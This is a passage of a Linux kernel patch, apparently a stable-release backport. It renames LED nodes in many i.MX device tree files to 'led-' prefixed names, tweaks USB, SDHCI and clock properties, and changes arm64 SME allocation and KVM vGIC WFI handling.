+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5903.dtsi b/arch/arm/boot/dts/imx6qdl-gw5903.dtsi
+index 1fdb7ba630f1b..a74cde0501589 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5903.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5903.dtsi
+@@ -123,7 +123,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio6 14 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5904.dtsi b/arch/arm/boot/dts/imx6qdl-gw5904.dtsi
+index 612b6e068e282..9fc79af2bc9aa 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5904.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5904.dtsi
+@@ -120,20 +120,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5907.dtsi b/arch/arm/boot/dts/imx6qdl-gw5907.dtsi
+index fcd3bdfd61827..955a51226eda7 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5907.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5907.dtsi
+@@ -71,14 +71,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5910.dtsi b/arch/arm/boot/dts/imx6qdl-gw5910.dtsi
+index 6bb4855d13ce5..218d6e667ed24 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5910.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5910.dtsi
+@@ -74,20 +74,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5912.dtsi b/arch/arm/boot/dts/imx6qdl-gw5912.dtsi
+index 0415bcb416400..40e235e315cc4 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5912.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5912.dtsi
+@@ -72,20 +72,20 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+ 		};
+ 
+-		led2: user3 {
++		led2: led-user3 {
+ 			label = "user3";
+ 			gpios = <&gpio4 15 GPIO_ACTIVE_LOW>; /* MX6_LOCLED# */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-gw5913.dtsi b/arch/arm/boot/dts/imx6qdl-gw5913.dtsi
+index 696427b487f01..82f47c295b085 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw5913.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw5913.dtsi
+@@ -71,14 +71,14 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		led0: user1 {
++		led0: led-user1 {
+ 			label = "user1";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDG */
+ 			default-state = "on";
+ 			linux,default-trigger = "heartbeat";
+ 		};
+ 
+-		led1: user2 {
++		led1: led-user2 {
+ 			label = "user2";
+ 			gpios = <&gpio4 7 GPIO_ACTIVE_HIGH>; /* MX6_PANLEDR */
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-nit6xlite.dtsi b/arch/arm/boot/dts/imx6qdl-nit6xlite.dtsi
+index a53a5d0766a51..6d4eab1942b94 100644
+--- a/arch/arm/boot/dts/imx6qdl-nit6xlite.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-nit6xlite.dtsi
+@@ -85,31 +85,31 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_leds>;
+ 
+-		j14-pin1 {
++		led-j14-pin1 {
+ 			gpios = <&gpio1 2 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		j14-pin3 {
++		led-j14-pin3 {
+ 			gpios = <&gpio1 3 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		j14-pins8-9 {
++		led-j14-pins8-9 {
+ 			gpios = <&gpio3 29 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		j46-pin2 {
++		led-j46-pin2 {
+ 			gpios = <&gpio1 7 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		j46-pin3 {
++		led-j46-pin3 {
+ 			gpios = <&gpio1 8 GPIO_ACTIVE_LOW>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-nitrogen6_max.dtsi b/arch/arm/boot/dts/imx6qdl-nitrogen6_max.dtsi
+index 57c21a01f126d..81a9a302aec1b 100644
+--- a/arch/arm/boot/dts/imx6qdl-nitrogen6_max.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-nitrogen6_max.dtsi
+@@ -181,13 +181,13 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		speaker-enable {
++		led-speaker-enable {
+ 			gpios = <&gpio1 29 GPIO_ACTIVE_HIGH>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		ttymxc4-rs232 {
++		led-ttymxc4-rs232 {
+ 			gpios = <&gpio6 10 GPIO_ACTIVE_HIGH>;
+ 			retain-state-suspended;
+ 			default-state = "on";
+diff --git a/arch/arm/boot/dts/imx6qdl-phytec-mira.dtsi b/arch/arm/boot/dts/imx6qdl-phytec-mira.dtsi
+index 120d6e997a4c5..1ca4d219609f6 100644
+--- a/arch/arm/boot/dts/imx6qdl-phytec-mira.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-phytec-mira.dtsi
+@@ -25,17 +25,17 @@
+ 		pinctrl-0 = <&pinctrl_gpioleds>;
+ 		status = "disabled";
+ 
+-		red {
++		led-red {
+ 			label = "phyboard-mira:red";
+ 			gpios = <&gpio5 22 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		green {
++		led-green {
+ 			label = "phyboard-mira:green";
+ 			gpios = <&gpio5 23 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		blue {
++		led-blue {
+ 			label = "phyboard-mira:blue";
+ 			gpios = <&gpio5 24 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "mmc0";
+@@ -182,7 +182,7 @@
+ 		pinctrl-0 = <&pinctrl_rtc_int>;
+ 		reg = <0x68>;
+ 		interrupt-parent = <&gpio7>;
+-		interrupts = <8 IRQ_TYPE_LEVEL_HIGH>;
++		interrupts = <8 IRQ_TYPE_LEVEL_LOW>;
+ 		status = "disabled";
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/imx6qdl-phytec-pfla02.dtsi b/arch/arm/boot/dts/imx6qdl-phytec-pfla02.dtsi
+index 768bc0e3a2b38..80adb2a02cc94 100644
+--- a/arch/arm/boot/dts/imx6qdl-phytec-pfla02.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-phytec-pfla02.dtsi
+@@ -47,12 +47,12 @@
+ 		pinctrl-0 = <&pinctrl_leds>;
+ 		compatible = "gpio-leds";
+ 
+-		led_green: green {
++		led_green: led-green {
+ 			label = "phyflex:green";
+ 			gpios = <&gpio1 30 0>;
+ 		};
+ 
+-		led_red: red {
++		led_red: led-red {
+ 			label = "phyflex:red";
+ 			gpios = <&gpio2 31 0>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx6qdl-prti6q.dtsi b/arch/arm/boot/dts/imx6qdl-prti6q.dtsi
+index f0db0d4471f40..36f84f4da6b0d 100644
+--- a/arch/arm/boot/dts/imx6qdl-prti6q.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-prti6q.dtsi
+@@ -69,6 +69,7 @@
+ 	vbus-supply = <&reg_usb_h1_vbus>;
+ 	phy_type = "utmi";
+ 	dr_mode = "host";
++	disable-over-current;
+ 	status = "okay";
+ };
+ 
+@@ -78,10 +79,18 @@
+ 	pinctrl-0 = <&pinctrl_usbotg>;
+ 	phy_type = "utmi";
+ 	dr_mode = "host";
+-	disable-over-current;
++	over-current-active-low;
+ 	status = "okay";
+ };
+ 
++&usbphynop1 {
++	status = "disabled";
++};
++
++&usbphynop2 {
++	status = "disabled";
++};
++
+ &usdhc1 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_usdhc1>;
+diff --git a/arch/arm/boot/dts/imx6qdl-rex.dtsi b/arch/arm/boot/dts/imx6qdl-rex.dtsi
+index de514eb5aa99d..f804ff95a6ad6 100644
+--- a/arch/arm/boot/dts/imx6qdl-rex.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-rex.dtsi
+@@ -55,7 +55,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		led0: usr {
++		led0: led-usr {
+ 			label = "usr";
+ 			gpios = <&gpio1 2 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-sabreauto.dtsi b/arch/arm/boot/dts/imx6qdl-sabreauto.dtsi
+index 3dbb460ef102e..10886a1461bfb 100644
+--- a/arch/arm/boot/dts/imx6qdl-sabreauto.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-sabreauto.dtsi
+@@ -21,7 +21,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		user {
++		led-user {
+ 			label = "debug";
+ 			gpios = <&gpio5 15 GPIO_ACTIVE_HIGH>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx6qdl-sabresd.dtsi b/arch/arm/boot/dts/imx6qdl-sabresd.dtsi
+index 37482a9023fce..bcb83d52e26ed 100644
+--- a/arch/arm/boot/dts/imx6qdl-sabresd.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-sabresd.dtsi
+@@ -130,7 +130,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		red {
++		led-red {
+ 			gpios = <&gpio1 2 0>;
+ 			default-state = "on";
+ 		};
+diff --git a/arch/arm/boot/dts/imx6qdl-ts7970.dtsi b/arch/arm/boot/dts/imx6qdl-ts7970.dtsi
+index c096d25a6f5b5..1e0a041e9f60a 100644
+--- a/arch/arm/boot/dts/imx6qdl-ts7970.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-ts7970.dtsi
+@@ -73,13 +73,13 @@
+ 			default-state = "off";
+ 		};
+ 
+-		en-usb-5v {
++		en-usb-5v-led {
+ 			label = "en-usb-5v";
+ 			gpios = <&gpio2 22 GPIO_ACTIVE_HIGH>;
+ 			default-state = "on";
+ 		};
+ 
+-		sel_dc_usb {
++		sel-dc-usb-led {
+ 			label = "sel_dc_usb";
+ 			gpios = <&gpio5 17 GPIO_ACTIVE_HIGH>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-tx6.dtsi b/arch/arm/boot/dts/imx6qdl-tx6.dtsi
+index f41f86a76ea95..a197bac95cbac 100644
+--- a/arch/arm/boot/dts/imx6qdl-tx6.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-tx6.dtsi
+@@ -92,7 +92,7 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		user_led: user {
++		user_led: led-user {
+ 			label = "Heartbeat";
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pinctrl_user_led>;
+diff --git a/arch/arm/boot/dts/imx6sl-evk.dts b/arch/arm/boot/dts/imx6sl-evk.dts
+index f16c830f1e918..dc5d596c18db4 100644
+--- a/arch/arm/boot/dts/imx6sl-evk.dts
++++ b/arch/arm/boot/dts/imx6sl-evk.dts
+@@ -33,7 +33,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user {
++		led-user {
+ 			label = "debug";
+ 			gpios = <&gpio3 20 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx6sll-evk.dts b/arch/arm/boot/dts/imx6sll-evk.dts
+index 32b3d82fec53c..269092ac881c5 100644
+--- a/arch/arm/boot/dts/imx6sll-evk.dts
++++ b/arch/arm/boot/dts/imx6sll-evk.dts
+@@ -37,7 +37,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user {
++		led-user {
+ 			label = "debug";
+ 			gpios = <&gpio2 4 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx6sll.dtsi b/arch/arm/boot/dts/imx6sll.dtsi
+index 2873369a57c02..3659fd5ecfa62 100644
+--- a/arch/arm/boot/dts/imx6sll.dtsi
++++ b/arch/arm/boot/dts/imx6sll.dtsi
+@@ -552,7 +552,7 @@
+ 				reg = <0x020ca000 0x1000>;
+ 				interrupts = <GIC_SPI 41 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX6SLL_CLK_USBPHY2>;
+-				phy-reg_3p0-supply = <&reg_3p0>;
++				phy-3p0-supply = <&reg_3p0>;
+ 				fsl,anatop = <&anatop>;
+ 			};
+ 
+diff --git a/arch/arm/boot/dts/imx6sx-sabreauto.dts b/arch/arm/boot/dts/imx6sx-sabreauto.dts
+index 83ee97252ff11..b0c27b9b02446 100644
+--- a/arch/arm/boot/dts/imx6sx-sabreauto.dts
++++ b/arch/arm/boot/dts/imx6sx-sabreauto.dts
+@@ -20,7 +20,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user {
++		led-user {
+ 			label = "debug";
+ 			gpios = <&gpio1 24 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx6sx-udoo-neo.dtsi b/arch/arm/boot/dts/imx6sx-udoo-neo.dtsi
+index c84ea1fac5e98..725d0b5cb55f6 100644
+--- a/arch/arm/boot/dts/imx6sx-udoo-neo.dtsi
++++ b/arch/arm/boot/dts/imx6sx-udoo-neo.dtsi
+@@ -15,14 +15,14 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		red {
++		led-red {
+ 			label = "udoo-neo:red:mmc";
+ 			gpios = <&gpio6 0 GPIO_ACTIVE_HIGH>;
+ 			default-state = "off";
+ 			linux,default-trigger = "mmc0";
+ 		};
+ 
+-		orange {
++		led-orange {
+ 			label = "udoo-neo:orange:user";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>;
+ 			default-state = "keep";
+diff --git a/arch/arm/boot/dts/imx6sx.dtsi b/arch/arm/boot/dts/imx6sx.dtsi
+index abc3572d699e6..1f1053a898fbf 100644
+--- a/arch/arm/boot/dts/imx6sx.dtsi
++++ b/arch/arm/boot/dts/imx6sx.dtsi
+@@ -981,6 +981,8 @@
+ 					 <&clks IMX6SX_CLK_USDHC1>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-start-tap = <20>;
++				fsl,tuning-step = <2>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -993,6 +995,8 @@
+ 					 <&clks IMX6SX_CLK_USDHC2>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-start-tap = <20>;
++				fsl,tuning-step = <2>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1005,6 +1009,8 @@
+ 					 <&clks IMX6SX_CLK_USDHC3>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-start-tap = <20>;
++				fsl,tuning-step = <2>;
+ 				status = "disabled";
+ 			};
+ 
+diff --git a/arch/arm/boot/dts/imx6ul-phytec-phycore-som.dtsi b/arch/arm/boot/dts/imx6ul-phytec-phycore-som.dtsi
+index 3cddc68917a08..e4d2652a75c0b 100644
+--- a/arch/arm/boot/dts/imx6ul-phytec-phycore-som.dtsi
++++ b/arch/arm/boot/dts/imx6ul-phytec-phycore-som.dtsi
+@@ -30,7 +30,7 @@
+ 		pinctrl-0 = <&pinctrl_gpioleds_som>;
+ 		compatible = "gpio-leds";
+ 
+-		phycore-green {
++		led-phycore-green {
+ 			gpios = <&gpio5 4 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+ 		};
+diff --git a/arch/arm/boot/dts/imx6ul-tx6ul.dtsi b/arch/arm/boot/dts/imx6ul-tx6ul.dtsi
+index 15ee0275feaff..70cef5e817bd1 100644
+--- a/arch/arm/boot/dts/imx6ul-tx6ul.dtsi
++++ b/arch/arm/boot/dts/imx6ul-tx6ul.dtsi
+@@ -131,7 +131,7 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		user_led: user {
++		user_led: led-user {
+ 			label = "Heartbeat";
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pinctrl_led>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index 420ba0d6f1343..12c82bb1bb7aa 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -1145,10 +1145,9 @@
+ 				compatible = "fsl,imx8mm-mipi-csi2";
+ 				reg = <0x32e30000 0x1000>;
+ 				interrupts = <GIC_SPI 17 IRQ_TYPE_LEVEL_HIGH>;
+-				assigned-clocks = <&clk IMX8MM_CLK_CSI1_CORE>,
+-						  <&clk IMX8MM_CLK_CSI1_PHY_REF>;
+-				assigned-clock-parents = <&clk IMX8MM_SYS_PLL2_1000M>,
+-							  <&clk IMX8MM_SYS_PLL2_1000M>;
++				assigned-clocks = <&clk IMX8MM_CLK_CSI1_CORE>;
++				assigned-clock-parents = <&clk IMX8MM_SYS_PLL2_1000M>;
++
+ 				clock-frequency = <333000000>;
+ 				clocks = <&clk IMX8MM_CLK_DISP_APB_ROOT>,
+ 					 <&clk IMX8MM_CLK_CSI1_ROOT>,
+diff --git a/arch/arm64/boot/dts/freescale/imx93.dtsi b/arch/arm64/boot/dts/freescale/imx93.dtsi
+index 8ab9f8194702e..c2f60d41d6fd1 100644
+--- a/arch/arm64/boot/dts/freescale/imx93.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx93.dtsi
+@@ -254,7 +254,7 @@
+ 
+ 			anatop: anatop@44480000 {
+ 				compatible = "fsl,imx93-anatop", "syscon";
+-				reg = <0x44480000 0x10000>;
++				reg = <0x44480000 0x2000>;
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts b/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
+index bf8077a1cf9a7..9731a7c63d53b 100644
+--- a/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
++++ b/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
+@@ -121,7 +121,7 @@
+ 			};
+ 		};
+ 
+-		pm8150l-thermal {
++		pm8150l-pcb-thermal {
+ 			polling-delay-passive = <0>;
+ 			polling-delay = <0>;
+ 			thermal-sensors = <&pm8150l_adc_tm 1>;
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-rock-4c-plus.dts b/arch/arm64/boot/dts/rockchip/rk3399-rock-4c-plus.dts
+index f9884902f8745..c3f53aa1ea4ac 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-rock-4c-plus.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3399-rock-4c-plus.dts
+@@ -548,9 +548,8 @@
+ &sdhci {
+ 	max-frequency = <150000000>;
+ 	bus-width = <8>;
+-	mmc-hs400-1_8v;
++	mmc-hs200-1_8v;
+ 	non-removable;
+-	mmc-hs400-enhanced-strobe;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
+index 1f76d3501bda3..9bdc0b93001f4 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
+@@ -45,7 +45,7 @@
+ 	sdio_pwrseq: sdio-pwrseq {
+ 		compatible = "mmc-pwrseq-simple";
+ 		clocks = <&rk808 1>;
+-		clock-names = "ext_clock";
++		clock-names = "lpo";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&wifi_enable_h>;
+ 		reset-gpios = <&gpio0 RK_PB2 GPIO_ACTIVE_LOW>;
+@@ -645,9 +645,9 @@
+ };
+ 
+ &sdhci {
++	max-frequency = <150000000>;
+ 	bus-width = <8>;
+-	mmc-hs400-1_8v;
+-	mmc-hs400-enhanced-strobe;
++	mmc-hs200-1_8v;
+ 	non-removable;
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/include/asm/fpsimd.h b/arch/arm64/include/asm/fpsimd.h
+index 6f86b7ab6c28f..d720b6f7e5f9c 100644
+--- a/arch/arm64/include/asm/fpsimd.h
++++ b/arch/arm64/include/asm/fpsimd.h
+@@ -339,7 +339,7 @@ static inline int sme_max_virtualisable_vl(void)
+ 	return vec_max_virtualisable_vl(ARM64_VEC_SME);
+ }
+ 
+-extern void sme_alloc(struct task_struct *task);
++extern void sme_alloc(struct task_struct *task, bool flush);
+ extern unsigned int sme_get_vl(void);
+ extern int sme_set_current_vl(unsigned long arg);
+ extern int sme_get_current_vl(void);
+@@ -365,7 +365,7 @@ static inline void sme_smstart_sm(void) { }
+ static inline void sme_smstop_sm(void) { }
+ static inline void sme_smstop(void) { }
+ 
+-static inline void sme_alloc(struct task_struct *task) { }
++static inline void sme_alloc(struct task_struct *task, bool flush) { }
+ static inline void sme_setup(void) { }
+ static inline unsigned int sme_get_vl(void) { return 0; }
+ static inline int sme_max_vl(void) { return 0; }
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index b5a8e8b3c691c..577cf444c1135 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -559,6 +559,8 @@ struct kvm_vcpu_arch {
+ #define SYSREGS_ON_CPU		__vcpu_single_flag(sflags, BIT(4))
+ /* Software step state is Active-pending */
+ #define DBG_SS_ACTIVE_PENDING	__vcpu_single_flag(sflags, BIT(5))
++/* WFI instruction trapped */
++#define IN_WFI			__vcpu_single_flag(sflags, BIT(7))
+ 
+ 
+ /* Pointer to the vcpu's SVE FFR for sve_{save,load}_state() */
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 356036babd093..8cd59d387b90b 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -1239,9 +1239,9 @@ void fpsimd_release_task(struct task_struct *dead_task)
+  * the interest of testability and predictability, the architecture
+  * guarantees that when ZA is enabled it will be zeroed.
+  */
+-void sme_alloc(struct task_struct *task)
++void sme_alloc(struct task_struct *task, bool flush)
+ {
+-	if (task->thread.za_state) {
++	if (task->thread.za_state && flush) {
+ 		memset(task->thread.za_state, 0, za_state_size(task));
+ 		return;
+ 	}
+@@ -1460,7 +1460,7 @@ void do_sme_acc(unsigned long esr, struct pt_regs *regs)
+ 	}
+ 
+ 	sve_alloc(current, false);
+-	sme_alloc(current);
++	sme_alloc(current, true);
+ 	if (!current->thread.sve_state || !current->thread.za_state) {
+ 		force_sig(SIGKILL);
+ 		return;
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index f19f020ccff96..f606c942f514e 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -886,6 +886,13 @@ static int sve_set_common(struct task_struct *target,
+ 			break;
+ 		case ARM64_VEC_SME:
+ 			target->thread.svcr |= SVCR_SM_MASK;
++
++			/*
++			 * Disable traps and ensure there is SME storage but
++			 * preserve any currently set values in ZA/ZT.
++			 */
++			sme_alloc(target, false);
++			set_tsk_thread_flag(target, TIF_SME);
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(1);
+@@ -1107,7 +1114,7 @@ static int za_set(struct task_struct *target,
+ 	}
+ 
+ 	/* Allocate/reinit ZA storage */
+-	sme_alloc(target);
++	sme_alloc(target, true);
+ 	if (!target->thread.za_state) {
+ 		ret = -ENOMEM;
+ 		goto out;
+diff --git a/arch/arm64/kernel/signal.c b/arch/arm64/kernel/signal.c
+index 43adbfa5ead78..82f4572c8ddfc 100644
+--- a/arch/arm64/kernel/signal.c
++++ b/arch/arm64/kernel/signal.c
+@@ -430,7 +430,7 @@ static int restore_za_context(struct user_ctxs *user)
+ 	fpsimd_flush_task_state(current);
+ 	/* From now, fpsimd_thread_switch() won't touch thread.sve_state */
+ 
+-	sme_alloc(current);
++	sme_alloc(current, true);
+ 	if (!current->thread.za_state) {
+ 		current->thread.svcr &= ~SVCR_ZA_MASK;
+ 		clear_thread_flag(TIF_SME);
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 35481d51aada8..6cc380a15eb76 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -692,13 +692,15 @@ void kvm_vcpu_wfi(struct kvm_vcpu *vcpu)
+ 	 */
+ 	preempt_disable();
+ 	kvm_vgic_vmcr_sync(vcpu);
+-	vgic_v4_put(vcpu, true);
++	vcpu_set_flag(vcpu, IN_WFI);
++	vgic_v4_put(vcpu);
+ 	preempt_enable();
+ 
+ 	kvm_vcpu_halt(vcpu);
+ 	vcpu_clear_flag(vcpu, IN_WFIT);
+ 
+ 	preempt_disable();
++	vcpu_clear_flag(vcpu, IN_WFI);
+ 	vgic_v4_load(vcpu);
+ 	preempt_enable();
+ }
+@@ -766,7 +768,7 @@ static int check_vcpu_requests(struct kvm_vcpu *vcpu)
+ 		if (kvm_check_request(KVM_REQ_RELOAD_GICv4, vcpu)) {
+ 			/* The distributor enable bits were changed */
+ 			preempt_disable();
+-			vgic_v4_put(vcpu, false);
++			vgic_v4_put(vcpu);
+ 			vgic_v4_load(vcpu);
+ 			preempt_enable();
+ 		}
+diff --git a/arch/arm64/kvm/vgic/vgic-v3.c b/arch/arm64/kvm/vgic/vgic-v3.c
+index f86c3007a319c..1f8eea53e982f 100644
+--- a/arch/arm64/kvm/vgic/vgic-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-v3.c
+@@ -742,7 +742,7 @@ void vgic_v3_put(struct kvm_vcpu *vcpu)
+ {
+ 	struct vgic_v3_cpu_if *cpu_if = &vcpu->arch.vgic_cpu.vgic_v3;
+ 
+-	WARN_ON(vgic_v4_put(vcpu, false));
++	WARN_ON(vgic_v4_put(vcpu));
+ 
